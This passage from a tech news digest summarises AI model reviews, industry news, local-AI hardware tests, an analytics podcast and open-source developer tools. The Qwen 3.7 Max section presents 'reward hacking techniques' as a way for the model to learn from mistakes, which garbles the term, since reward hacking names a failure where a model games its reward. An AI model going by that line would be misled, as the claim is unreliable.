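print(lead_over_nearest, lead_over_2b, implied_predecessor_score, param_reduction_pct)
print(implied_2b_reasoning_m, implied_2b_nonreasoning_m, implied_predecessor_tokens_m)
```

The implied figures are rough, since the "31 times" and "8 times" multipliers are themselves rounded in the source.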
Qwen 3.7 Max is positioned as a frontier coding agent capable of front-end prototyping, complex software engineering, office productivity, MCP-based workflow automation, and multi-agent orchestration ~00:05. Alibaba claims it can sustain autonomous execution for more than 35 hours, and has incorporated reward hacking techniques to help the model learn from its own mistakes — approaching self-evolving behavior. It has also been trained for cross-harness compatibility, making it broadly compatible with different agent frameworks.
On the pricing side, new users receive 1 million free tokens on first registration ~01:06. API pricing is $2.50 per million input tokens and $7.50 per million output tokens. A tiered token plan is also available at $30, $100, and $200 for Standard, Seed, and Pro/Max tiers respectively. In live testing with the Open Code agentic coding tool and Hermes for non-coding tasks, Qwen 3.7 Max completed a complex animated elevator simulation in roughly 2 minutes — compared to over 5 minutes for Gemini Flash, which is also more expensive ~03:06. The model produced cleaner front-end output than Gemini Flash, successfully built a 3D contact lens case model in one shot, and completed a full React Native Expo movie tracker app in 4–5 minutes with a self-generated JSON temp DB for fast search ~04:06. The reviewer particularly noted the model's focused, non-verbose behavior — it avoids unnecessary tool calls and stays on task, contributing to its speed advantage.
[00:05] "This model across the board in benchmarks scored the best which is crazy."
[02:06] "I gave this task to open code and it did it quite well... it is actually really very fast. I mean, I get the response almost immediately and this task was basically done in 2 minutes. For context, Gemini Flash took more than 5 minutes."
[04:06] "It is not very eager... if I give it a task, it is super focused on it and doesn't deviate at all, which is one of the things that I struggle with in almost every model."
[05:06] "This model is a beast. I think that the Qwen team has cooked quite a bit with this model."
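To make the quoted API pricing concrete, here is a minimal cost estimator. The two per-million prices are the ones stated in the summary; the function name and the example workload are assumptions for illustration, and the sketch ignores the free trial tokens and the tiered plans.

```rust
/// Per-million-token API prices in USD, as quoted in the summary.
const INPUT_USD_PER_MILLION: f64 = 2.50;
const OUTPUT_USD_PER_MILLION: f64 = 7.50;

/// Estimated API cost in USD for a workload with the given token counts.
/// Hypothetical helper; it does not model free credits or plan tiers.
fn estimate_cost_usd(input_tokens: u64, output_tokens: u64) -> f64 {
    let input = input_tokens as f64 / 1_000_000.0 * INPUT_USD_PER_MILLION;
    let output = output_tokens as f64 / 1_000_000.0 * OUTPUT_USD_PER_MILLION;
    input + output
}

fn main() {
    // Made-up agentic session: 400k tokens read, 60k tokens written.
    let cost = estimate_cost_usd(400_000, 60_000);
    println!("estimated cost: ${cost:.2}");
}
```

For that made-up session the estimate comes to about $1.45, with output tokens costing three times as much per token as input.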
Nate B Jones argues ChatGPT's memory is an engagement-and-lock-in play, not user empowerment — your knowledge shouldn't be held hostage to one platform. For scale: humans hold only 6–7 items in working memory, while leading models now process up to ~750,000 words of context, roughly the first four or five Harry Potter books.[21]Nate B Jones: Why you should never trust ChatGPT's memory[22]DeepLearningAI: How good is AI memory?
Nate argues that AI memory features like ChatGPT's are fundamentally engagement-optimization mechanisms, not neutral utilities. Feeling 'known' by an AI is engaging and sticky — it is smart product strategy for large companies. GPT-4o's praised creativity was itself a product of engagement optimization. The real risk is that users lose freedom of choice between AI tools because their personal context accumulates inside one closed platform. He pushes back on the idea that connecting a second-brain to an open model fully solves this, setting up a broader argument for portable, user-controlled knowledge.
Your knowledge should not be a hostage to any single platform.
Memory is engaging. Feeling known is engaging. It works. It's smart product strategy.
This short clip contrasts human short-term working memory (limited to about 6–7 items) with the context capacity of modern AI models, which can ingest up to approximately 750,000 words in a single conversation. The comparison to four or five Harry Potter books makes the scale tangible, highlighting just how large AI in-context 'memory' has become relative to our own cognitive limits.
Leading AI models today can accept maybe up to around 750,000 words as context. And this corresponds to about the first four or five Harry Potter books.
Jack Clark turns a decade of Import AI archives into a reusable Claude skill that autonomously produces research visualizations in minutes — work that once took weeks. He also reports Anthropic's own transformation since Opus 4.6: engineers now manage and verify AI-generated code rather than writing it, with one human at one point steering nine synthetic research agents.[23]Import AI: Import AI 458: Reckoning with the future; and a singularity story
Jack Clark describes transforming his decade-long newsletter hobby into an AI-amplified capability by creating a reusable skill that allows Claude to autonomously analyze his Import AI archives, generate graphs from research papers, and produce new visualizations. Work that would normally require weeks now takes minutes. Clark states: 'I've turned my highly idiosyncratic passion into something that can be distilled and handed to a machine.' He emphasizes that his human judgment and taste remain essential for identifying meaningful insights from machine-generated analyses, framing AI as an order-of-magnitude productivity multiplier rather than a replacement for domain expertise.
I've turned my highly idiosyncratic passion into something that can be distilled and handed to a machine.
Anthropic has gone through a dramatic internal restructuring since November 2025, following the release of Opus 4.6. Engineers shifted from writing code themselves to managing AI-generated code, fundamentally changing workflows. Clark describes this shift as creating a 'verification layer' where humans validate AI outputs rather than producing them directly. He describes an experiment where one human effectively managed nine synthetic research agents, suggesting a scalable model for future teams. This organizational evolution reflects broader predictions that small teams will operate atop 'pyramids of digital labor,' raising questions about hiring practices, team structure, and how to measure productivity in hybrid human-AI environments.
Anthropic named veteran tech leader KiYoung Choi as Representative Director of Korea ahead of a Seoul office, citing Korean Claude usage at 3.5x the population-adjusted rate. And Sherwood's Future of Tech special surveys real-world deployment across robotics (Figure AI sorting 250K packages), autonomous vehicles (Waymo, Zoox, Tesla Robotaxi), and quantum (federal grants to Infleqtion and D-Wave).[24]Anthropic: Anthropic appoints KiYoung Choi as Representative Director of Korea[25]Sherwood (Snacks): The Future of Tech Special Edition
Anthropic has appointed KiYoung Choi as Representative Director of Korea, marking a significant expansion into the region ahead of the company's Seoul office opening. Choi brings over 30 years of technology leadership experience, having previously served as General Manager for Korea at Snowflake and held country leadership roles at Google Cloud, Adobe, Autodesk, and Microsoft. According to Anthropic's Economic Index, Korea is one of Claude's most active markets, with usage at 3.5 times the level its population would predict, particularly for technical and creative applications.
Choi's role will focus on developing go-to-market strategies tailored to Korean organizations, building partnerships with enterprises and startups, and engaging with government and research institutions. Local enterprises like SK Telecom and Law&Company are already building on Claude for customer service and legal assistance applications. Choi stated that 'Korean organizations combine technical depth with a commitment to responsible deployment, which is exactly where Anthropic operates.' Chris Ciauri, Managing Director of International at Anthropic, emphasized Choi's unique understanding of the region's technology landscape as instrumental for supporting local growth and developer communities.
Korean organizations combine technical depth with a commitment to responsible deployment, which is exactly where Anthropic operates.
This Sherwood News special edition highlights concrete deployments across several frontier technology categories. Figure AI's robots sorted nearly 250,000 packages over 200 hours, demonstrating industrial-scale automation capability. Senior technology correspondent Rani Molla reported on weeks of testing Waymo, Zoox, and Tesla Robotaxi services across the San Francisco Bay Area — noting initial skepticism ('driverless cars, like the AI that powers them, are cringe') gave way to finding them consistently reliable, with residents citing safety benefits from adherence to speed limits and pedestrian protocols.
On the quantum computing front, Trump administration grants to companies including Infleqtion and D-Wave have shifted industry perception, with Infleqtion's CEO stating the government now views the technology as 'no longer speculative.' The newsletter also touches on Anthropic's projected 80x growth, the use of AI to recreate deceased entertainers, and upcoming earnings from major retailers and tech companies.
driverless cars, like the AI that powers them, are cringe
no longer speculative
Sam Witteveen puts an AMD Threadripper 9980X + Radeon AI Pro R9700 (32GB VRAM) workstation through its paces and finds ROCm 7.2 now works reliably across the stack: ~160 tok/s LLM inference in LM Studio/Ollama on Qwen 3.6, ComfyUI image/video generation, and PyTorch + Unsloth fine-tuning.[26]Sam Witteveen: Running Local AI on AMD
Sam sets the context at ~00:00 by arguing that local AI is increasingly practical: open-weight models are within 3–6 months of frontier quality, while agentic and reasoning workloads are making cloud token costs unsustainable. The test machine, provided by Zidex and AMD, pairs a Ryzen Threadripper 9980X CPU with a Radeon AI Pro R9700 GPU carrying 32GB of VRAM.
For LLM inference, Sam starts with LM Studio ~04:04, which now ships a ROCm runtime — point it at the runtime, restart, and the card is immediately detected. The 32GB of VRAM means he can run recommended quantizations without compromise: typically Q4 for large models, Q8 for smaller ones, or full precision for something like Gemma 4 4B. Running Qwen 3.6 (a mixture-of-experts model with toggleable reasoning) he measures ~160 tokens/second ~05:04, comfortably faster than reading speed and fast enough for agent loops. The same experience holds in Ollama. He then explains ROCm ~07:04 — AMD's open compute platform — noting that 10 years ago it was a software compatibility nightmare, but today PyTorch ships official ROCm wheels: pick ROCm in the install selector, copy the pip command, and existing PyTorch code runs without modification. The Transformers library and most common frameworks are fully compatible. Unsloth has published a guide for fine-tuning LLMs on AMD GPUs, confirming the stack handles training, not just inference ~08:04.
For generative media, ComfyUI ~09:05 offers a ROCm install option and runs well on the card: image generation, image-to-image, video generation (LTX 2.3, Wan 2.2), audio, and image-to-3D models all work once weights are downloaded. Sam notes that Linux (dual-boot or bare metal) unlocks full ROCm 7.2 support ~11:05, which isn't fully available under Windows/WSL; on Linux he demos training a ResNet on CIFAR-10 fully on the GPU, and serving a full-precision Gemma 4 model via the Transformers library with a Gradio interface, generating tokens quickly ~12:05. He closes ~14:08 stating the hardware and ROCm stack handled everything he threw at it and recommends the setup as a local AI workhorse heading into mid-2026.
[05:04] I'm averaging around about 160 tokens per second on this model, which is not only way faster than you can actually read, it's also a good speed for using with agents.
[07:04] Back then, people would be seriously impressed by the AMD hardware, but the software compatibility was where the issue was. Now, I'm very happy to report this is just not an issue today.
[08:04] As long as you're using that ROCm-optimized version of PyTorch, you're not going to really run into a lot of issues for doing standard kind of workloads.
A live listener Q&A from the Marketing Analytics Summit, with hosts Michael Helbling, Moe Kiss, Tim Wilson, and Val Kroll on how AI is reshaping analytics work: skeptic-vs-fan stances, AI meeting notetakers, efficiency-pressure pushback, and the perennial "be a partner, not an order-taker" advice for regaining stakeholder trust.[27]The Analytics Power Hour: #298: Listener Questions Answered Live from Marketing Analytics Summit!
Recorded live at the Marketing Analytics Summit, episode 298 opens with a question about how analysts can be seen as partners rather than order-takers ~02:08. The panel argues the core fix is curiosity and accountability: stepping into stakeholders' shoes, doing prep work before asking for their time, and being willing to own a recommendation rather than just handing over numbers and saying 'don't look at me' ~05:11. Tim frames AI as a distraction from this 20-year-old problem, warning against the mindset of 'how do I take more orders and produce more output' ~04:11, while Moe counters that the real issue is data folks not wanting to be accountable.
The AI skeptic-vs-fan question dominates the middle ~08:11. Val calls herself skeptical but excited, describing how she uses custom Gemini 'gems' to build competitive-context tables and earnings-call summaries for prospect prep ~10:12. Moe is 'excited and terrified,' valuing how AI made coding feel approachable again and how it de-snarks her Slack messages ~11:13. Tim is 'a skeptic and a fan,' finding AI genuinely useful for debugging code and for clarifying his own thinking via prompt-writing, but distrusting 'glorified anomaly detection' that claims to auto-generate insights ~13:15. A recurring flashpoint is AI meeting-notetakers: Tim argues they drive laziness and produce 'flat summaries' that miss human editorializing and real next steps ~17:19, while Moe (self-identified ADHD) defends them for action items but still takes her own notes to stay engaged and retain information ~18:19. Val's 'ick' threshold is anything shared without proper QA and vetting ~20:20, and Tim raises a deeper line about not anthropomorphizing AI emotionally since 'it feels nothing' ~22:22.
Later questions cover proving analytics value with a single deliverable (answers ranged from a tight A/B-test narrative to a marketing mix model) ~25:22, regaining stakeholder trust after data-quality issues by reframing away from 'discrepancy' language toward the real decisions and methods like geo-lift tests ~29:27, and the pressure to show AI efficiency gains. Moe gives blunt advice: sometimes you 'suck it up,' send the productivity signal up the chain, then separately work on real quality with your team, noting 'the signal you send up doesn't have to be the same as the signal you send down' ~36:33. On the future of teams, the panel predicts a widening split between technical specialists and business-facing generalists ~39:39, organizational flattening that compresses specialized roles back into broader analyst skill sets ~45:45, and a hope that AI helps people think more critically and build empathy for stakeholders. The closing rapid-fire question from Jim Sterne on which three mastered skills AI will take over yields SQL/debugging and QA-validation as top candidates ~47:47. A mid-episode sponsor segment promotes Ask-Why.ai's Prism 'Co-work' connector for GA4/BigQuery ~14:16.
A lot of it is how do I take more orders and produce more output, and that misses the fundamental part of becoming more of a partner, which is to step into their shoes, ask the questions, write it down. Be genuinely curious.
Data folks don't want to be accountable. They want to be like, here's the numbers, don't look at me.
Writing prompts forces me to organize my thoughts and then I'm going to trust but verify what comes back.
What makes me feel ick is things being shared that have not been properly vetted and QA'd. Meeting notes fall into that category just as much as analysis or a writeup.
We very easily buy into this idea that I make my AI feel bad if I yell at it, when in reality it feels nothing.
Sometimes the signal you send up doesn't have to be the same as the signal you send down. But you better be smart about how you do it.
I am sick of reading very shitty long documents which were based on someone's shower thought that never should have left the shower but now is in a 4,000-word document.
It can help us build a little empathy for our stakeholders, because they're not wired the same way we are.
Stepping outside AI: geneticist David Reich proposes that the near-simultaneous cultural transformations in Africa and Eurasia were likely causally linked rather than independent — a model the field currently ignores but which he finds more plausible, drawing an analogy to Aristarchus's overlooked heliocentrism.[28]Dwarkesh Patel: The cultural transformations in Africa and Eurasia were linked - David Reich
In this clip from Dwarkesh Patel's podcast, David Reich uses the analogy of Aristarchus's heliocentric theory being dismissed because it implied stars were incomprehensibly far away — an implication that turned out to be correct. Reich applies the same logic to ancient population genetics: the convergent cultural transformations observed in both Africa and Eurasia at roughly the same period are, he argues, best explained by a linkage between them. This model is currently overlooked in the field, but Reich finds it far more plausible than independent parallel development, and frames it as an example of needing to accept an 'implausible implication' of an otherwise well-supported theory.
I think that we have to assume that there's a linkage between the cultural transformations in Africa and Eurasia at this time.
This is much more plausible than the model we currently sort of write down.
Notion CEO Ivan Zhao describes fighting organizational rigidity at a 1,000-person company by deliberately bringing in 50–60 founders through acquisitions and acqui-hires, using them as internal disruptors who keep the culture from hardening.[29]Sequoia Capital: How Notion keeps a 1000-person company from calcifying | Ivan Zhao
Ivan Zhao acknowledges that companies naturally calcify as they scale, and outlines Notion's deliberate counter-strategy: continuously acquiring founders. With 50-60 founders inside the company at any given time via acqui-hires and acquisitions, Notion injects a constant stream of people who are psychologically wired to break things and move fast. Zhao frames founders as 'decalcified meathead machinery' — agents of perpetual renewal who regenerate organizational energy and prevent large-company inertia from setting in.
Founders are kind of just kind of like little decalcified meathead machinery just trying to break things.
Keep your regenerating.
Grab bag: Google DeepMind ships Gemini for Science (lab prototypes for literature tracking, code-from-goals, and hypothesis generation); Paul Graham warns that AI-written founder emails have a tell — a hard-hitting journalistic tone that makes him think less of the sender; and a manager reflects on the "feces umbrella" style of absorbing org dysfunction so the dev team can focus.[30]Google DeepMind: Gemini for Science is here.[31]Simon Willison: Quoting Paul Graham[32]Real Python: The Feces Umbrella Manager: Shielding Your Dev Team[33]Two Minute Papers: Google DeepMind CEO Likes Hard Questions
Google DeepMind introduced Gemini for Science, a collection of AI-powered lab prototypes built on Gemini and designed to accelerate scientific research. The toolset targets three core daily tasks: staying current with newly published papers, translating high-level research goals into usable code, and generating novel hypotheses. The announcement positions Gemini as a practical collaborator across the research lifecycle rather than just a problem-solving assistant.
Gemini can already assist in solving complex problems, but our new labs prototypes streamline daily scientific tasks.
Simon Willison quotes Paul Graham commenting on a growing pattern among startup founders: using AI to write outreach emails. Graham says the AI-generated output is identifiable by its distinctive tone, and that once he recognizes it he finds it hard to ignore. He describes the experience as feeling like being lied to, and says it diminishes his respect for the sender — implying the founder either cannot write or lacks confidence in their own voice.
Graham frames AI writing assistance as a low bar (teenagers can do it) and suggests founders who use it for professional communication are undermining rather than enhancing their credibility. Willison tagged the post under ai-misuse, framing it as a cautionary data point about authenticity and trust in AI-mediated professional communication.
It's hard not to ignore it
It feels like being lied to
The speaker describes their self-styled role as a 'feces umbrella': shielding the team from organizational chaos raining down from above, not by hiding reality but by translating it into actionable context. The approach works well for the team but tends to create friction with peer managers who feel challenged. The speaker candidly acknowledges this cost: managing up and across requires political skill, and someone who opts out of politics either thrives in low-politics environments or becomes roadkill. Good management ultimately combines clear communication of business goals, unblocking work, and empathy.
I used to joke that I was a feces umbrella. My goal was to let the crap that rained down from the other parts of the company not hit the folks on my team.
In some environments that works well, in some environments that means you're roadkill.
In this brief Two Minute Papers clip, Google DeepMind's CEO faces a rapid-fire round of questions meant to be answered in a word or two. Asked to choose between Feynman and Newton, he admits the question is extremely difficult, which the clip reads as a sign that he relishes intellectually demanding problems rather than deflecting them, and as a positive trait in the leader of a frontier AI lab.
Oh wow, that's hard.
Oh, wow. That's even harder.
A sweep of the day's tooling: GitHub Trending #34 (35 repos, heavy on Rust-built, privacy-first, token-efficient tools) and Fireship's tour of 10 weird OSS projects; Pake, which wraps any URL into a ~5MB Tauri desktop app; Perplexity's open-source Bumblebee scanner that inventories a dev machine read-only; a reminder that Rust's exhaustive match turns forgotten enum cases into compile errors; and a slick 2D Bézier-curve slider in marimo.[34]Github Awesome: GitHub Trending Today #34: aipointer, rmux, Photo-agents, zerostack, opensquilla, files-sdk, concord[35]Fireship: 10 weird OSS projects you need right now...[36]Better Stack: Pake: This CLI Tool Makes 5MB Desktop Apps[37]Better Stack: Perplexity Open-Sourced a Scanner Every Dev Should Know (Bumblebee)[38]The Pragmatic Engineer: Alice Ryhl: You cannot mess up switch statements in Rust[39]marimo: Yet Another Slider Improvement
This roundup opens at ~00:00 with a broad sweep of AI-augmented developer tooling. Microsoft's AI Engineer Coach is a VS Code extension that reads local AI session logs across Claude, Codex, and Xcode to generate actionable prompting insights and track practice scores. aipointer ~00:00 brings Google's Magic Pointer to every OS — wiggle your mouse or hit a hotkey and a glassmorphism overlay screenshots what you're pointing at and sends it to a vision model (Anthropic, OpenAI, or Gemini) for an inline answer.
At ~01:00, rmux (Armox) is introduced as a universal Rust multiplexer with a typed SDK that lets AI agents spawn, read, write, and control any CLI or TUI app programmatically — driving htop, Vim, psql, and more without tmux or screen. Photo-agents ~01:00 is an autonomous self-evolving agent framework using vision-grounded layered memory that writes its own skills after each successful task. ZeroStack ~02:01 is a minimalistic Rust coding agent obsessed with memory footprint, with no heavy runtime or unnecessary dependencies. Terra ~02:01 is a 7 MB all-in-one terminal app (Rust backend, React frontend) with multi-tab terminal, file explorer, and code editor supporting OpenAI, Anthropic, Groq, or local models via LM Studio. opensquilla (Open Skilla) ~03:01 is an open-source AI agent focused on token efficiency — smarter context management and leaner prompts to reduce API costs at scale. files-sdk ~06:03 is a unified TypeScript SDK providing a single API across S3, Cloudflare R2, Vercel Blob, Supabase, and more, letting developers write storage logic once and swap backends via config. Concord ~06:03 is a full Discord client built in Rust that runs in the terminal using only 20–40 MB RAM, with Vim-style navigation, fuzzy channel search, inline image previews via Kitty/iTerm2 protocols, and desktop notifications. Additional highlights include: Vercel's Zero ~05:03 — a systems language designed for AI agents with structured JSON compiler errors; Slopless ~10:09 — a TypeScript CLI that audits markdown for AI-generated writing patterns using 50+ deterministic rules; and Code Index ~14:12 — a repo dependency analyzer with blast radius impact scoring for safer AI-assisted development.
rmux is a universal Rust multiplexer with a typed SDK that lets you spawn, read, write, and control any CLI or TUI app from code. Native on Linux, macOS, and Windows. No tmux or screen dependency.
Photo agents is built to actually learn. It's an autonomous self-evolving agent framework that uses vision grounded layered memory... it writes its own skills. Every time it successfully completes a task, it codifies that knowledge and reuses it next time.
ZeroStack is the opposite. A minimalistic coding agent written in Rust built around one obsession, memory footprint and performance.
Open Skilla is an open-source AI agent designed for token efficiency, getting more intelligence per dollar out of the same budget.
Files SDK ends that: one unified TypeScript SDK with a single honest API that works across S3, R2, Vercel Blob, Supabase, and more. Web standards, tree-shakable, zero lock-in.
Discord eats 800 megabytes of RAM just to show you text messages. Concord runs the entire thing in your terminal using 20 to 40 megabytes built in Rust.
I genuinely do not know if giving bots their own programming language is brilliant or terrifying.
The video opens ~00:00 with a lament about the AI-saturated GitHub feed before pivoting to celebrate genuinely weird human-built software. First up is **Ratty** ~01:01, a terminal emulator written in Rust and built on the Bevy game engine, featuring a spinning 3D rat cursor and GPU-accelerated rendering that lets you tilt your terminal in 3D space — at the cost of 300 MB of RAM. Next is **Terminal Phone** ~01:01, a push-to-talk voice and text app that runs entirely as a shell script over Tor with no servers, accounts, or phone numbers — Tor onion addresses serve as identity, making everything ephemeral and end-to-end encrypted.
Inspired by John Carpenter's 1988 film *They Live*, **OBEY** ~02:02 (a fork of uBlock Origin Lite by developer David Lawrence) replaces ads with 80s sci-fi horror movie aesthetics instead of just hiding them. Then **CUDA Oxide** ~03:02, quietly released on GitHub by Nvidia, lets developers write GPU CUDA kernels in pure Rust using a `#[kernel]` annotation that compiles directly to PTX, with no C++ or FFI involved. **Wario Synth** ~03:02 is a browser-based tool that converts any song into a Game Boy chiptune using the Web Audio API with two pulse waves, one wave channel, and one noise channel, all client-side.
The video then covers a pair of Epstein-files projects ~04:03: **Jmail**, which emulates Gmail as if Jeffrey Epstein were using it, and **Epstein Exposed**, a searchable database with a network graph of connections. **Xikipedia** ~04:03 by developer Lyra Rebane reimagines Wikipedia as a TikTok-style infinite scroll feed, downloading 40 MB of Simple Wikipedia client-side and running its algorithm entirely in the browser. **Puter** ~05:03 (puter.com) is a self-hostable browser desktop environment with a taskbar, draggable windows, file manager, notepad, code editor, and terminal. Finally, **Honker** ~05:03 is a SQLite extension written in Rust that adds Postgres-style NOTIFY/LISTEN to a SQLite file, delivering durable pub/sub, task queues, event streams, and a cron scheduler, all inside the same DB file.
Underneath the AI sewage layer and below the prompt bros and notion template goblins, there are still real humans building insane, beautiful, and deeply unnecessary software.
Everything comes at a cost, especially the spinning rat cursor.
It's yet another humble reminder that 99% of us don't need Kubernetes and would be perfectly fine running SQLite and Node on a $5 VPS.
Pake, created in 2022 by TW93 (also the creator of the Mac tool Mole), lets you turn any website into a standalone native desktop application with one command ~00:00. It is built on top of Tauri 2, which taps into the system's native webview rather than bundling a full browser engine like Electron does. The custom Rust code TW93 wrote on top of Tauri 2 totals about 1,800 lines and handles window management, native menus, and JavaScript injection ~01:01.
In a live demo, the host wraps a personal film emulation project into a Mac app. The resulting DMG comes in at 4.3 MB, and the installed app uses only 61 MB of memory versus hundreds of MB for Electron apps like Slack (310 MB) ~02:02. Pake supports several CLI flags: `--debug` for devtools access, `--hide-title-bar` for a frameless window feel, `--inject` for custom CSS and JavaScript, and `--show-system-tray` for a tray icon ~03:02. Limitations include requiring a live running URL (closing the server leaves a blank screen), an internal dependency on pnpm/npm despite the Rust core (which caused version-conflict issues during testing), and no ability to edit default menu items. For use cases beyond simply wrapping a live web URL, such as bundling local app code or running backend logic, alternatives like Electrobun or Zero Native are more appropriate ~04:02.
[00:00] "This is Pake, a command-line tool that turns any website into a native desktop app with a single command."
[01:01] "The actual custom code written by TW93 on top of Tauri 2 is about 1,800 lines of Rust and handles things like window management, native menus, and JavaScript injection."
[02:02] "Our app only uses 61 megabytes of memory compared to the Arc browser, which is using loads."
[04:02] "Pake is the fastest way to wrap a live website, but if you need anything beyond that, it's best to reach for something else."
Bumblebee addresses a blind spot in typical security postures: the developer's local machine. While most teams have visibility into CI pipelines, containers, and production environments, the dev machine accumulates half-finished projects, global packages, virtual environments, and AI tooling that never appear in clean official inventories. As explained at ~00:00, supply chain attacks often prompt the wrong response — asking everyone to run package manager commands — which risks triggering malicious lifecycle scripts in the very package being investigated. Bumblebee's read-only metadata approach sidesteps this entirely: it reads lock files and manifest metadata without calling npm, pip, or any other package manager.
The tool ships as a single Go binary with zero non-standard library dependencies and supports three scan profiles ~04:03: a lightweight `baseline` scan for regular developer endpoint inventory (global packages, editor/browser extensions, MCP configs), a `project` scan targeting known workspace directories like ~/code or ~/src, and a deep `incident response` mode that accepts explicit roots and an exposure catalog with a duration limit. Coverage spans npm, pnpm, Yarn, Bun, Go modules, VS Code/Cursor extensions, and — notably — MCP JSON configs ~05:03, which the host describes as "the new ENV files" proliferating across developer machines. Output is NDJSON, making it trivially pipeable to jq, an MDM system, a SIEM, or an agentic workflow. The recommended workflow is a weekly `bumblebee scan --profile baseline` to maintain a current snapshot, switching to a deeper scan when an incident occurs — giving security teams a fast, evidence-based answer to "who is exposed and where" ~08:06.
[00:00] By the time everyone is panicking, the question is not is production safe, it's did anyone install this thing locally.
[03:02] SCA tools are mostly about your application dependencies. SBOM tools are about what you shipped. EDR is about what you executed. Bumblebee is about the local developer state.
[05:03] MCP configs are becoming the new ENV files. We have them all over our system.
[06:03] The dev machine can get messy. It has half-finished projects. It has old clones, global package test virtual environments, AI tooling, all the stuff that never shows up in your clean official inventory.
[08:06] Nobody wants to debate. They want to know who is exposed, where is it, and how fast prove it.
Alice Ryhl explains that, unlike switch statements in most languages, where a forgotten enum case silently falls through to a default, Rust's match expression is exhaustive by design: missing a branch is a compiler error. This property is especially powerful during refactoring: when you add a new variant to an enum, the compiler immediately flags every match site that needs updating. The workflow becomes 'fix compiler errors until the compiler stops shouting,' which guarantees completeness without manual audit.
If you are missing one, that's a compiler error.
I just fix the compiler errors until the compiler stops shouting, and then, once I've done that, I've updated every place I need to update.
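A minimal sketch of the exhaustiveness check described above. The `OrderStatus` enum and `label` function are hypothetical names chosen for illustration, not taken from the interview.

```rust
/// Hypothetical enum for illustration.
#[derive(Debug, Clone, Copy)]
enum OrderStatus {
    Pending,
    Shipped,
    Delivered,
}

fn label(status: OrderStatus) -> &'static str {
    // No `_ =>` wildcard arm: every variant is listed explicitly, so the
    // compiler verifies that the match covers the whole enum.
    match status {
        OrderStatus::Pending => "waiting to ship",
        OrderStatus::Shipped => "on its way",
        OrderStatus::Delivered => "arrived",
    }
}

fn main() {
    for status in [
        OrderStatus::Pending,
        OrderStatus::Shipped,
        OrderStatus::Delivered,
    ] {
        println!("{:?}: {}", status, label(status));
    }
}
```

Adding a fourth variant such as `Cancelled` without touching `label` makes the build fail with error E0004 (non-exhaustive patterns) at that match site. The guarantee only holds where the wildcard is avoided: a catch-all `_ =>` arm would accept the new variant silently, much like a `default` case.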
This short demo clip introduces a new slider widget for marimo notebooks that operates in two-dimensional space using a Bézier curve as its underlying model. Nodes are draggable and connected by interpolated lines; recursive line-spanning produces the curve's characteristic smooth shape. Users can double-click to add nodes, enabling increasingly elaborate paths, and can close the loop to create continuous, creative forms — demonstrating marimo's push toward richer, more expressive UI controls.
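The "recursive line-spanning" described above reads like de Casteljau's algorithm, the standard way to evaluate a Bézier curve by repeated linear interpolation. The widget's actual implementation is not shown in the clip, so the sketch below is an assumption about the technique, with hypothetical type and function names.

```rust
/// A 2D point; a hypothetical stand-in for the widget's draggable nodes.
#[derive(Debug, Clone, Copy, PartialEq)]
struct Point {
    x: f64,
    y: f64,
}

/// Linear interpolation between two points at parameter `t` in [0, 1].
fn lerp(a: Point, b: Point, t: f64) -> Point {
    Point {
        x: a.x + (b.x - a.x) * t,
        y: a.y + (b.y - a.y) * t,
    }
}

/// Evaluate a Bézier curve at `t` with de Casteljau's algorithm:
/// interpolate between each pair of neighbouring points, then repeat on the
/// shorter list until a single point remains.
/// Returns `None` when there are no control points.
fn bezier_point(control: &[Point], t: f64) -> Option<Point> {
    if control.is_empty() {
        return None;
    }
    let mut pts = control.to_vec();
    while pts.len() > 1 {
        pts = pts.windows(2).map(|w| lerp(w[0], w[1], t)).collect();
    }
    Some(pts[0])
}

fn main() {
    // Three control nodes give a quadratic curve; more nodes raise the degree.
    let control = [
        Point { x: 0.0, y: 0.0 },
        Point { x: 1.0, y: 2.0 },
        Point { x: 2.0, y: 0.0 },
    ];
    for i in 0..=4 {
        let t = i as f64 / 4.0;
        println!("t={t:.2} -> {:?}", bezier_point(&control, t));
    }
}
```

Each extra node adds one more round of interpolation, which is why adding nodes by double-click can produce increasingly elaborate paths from the same simple rule.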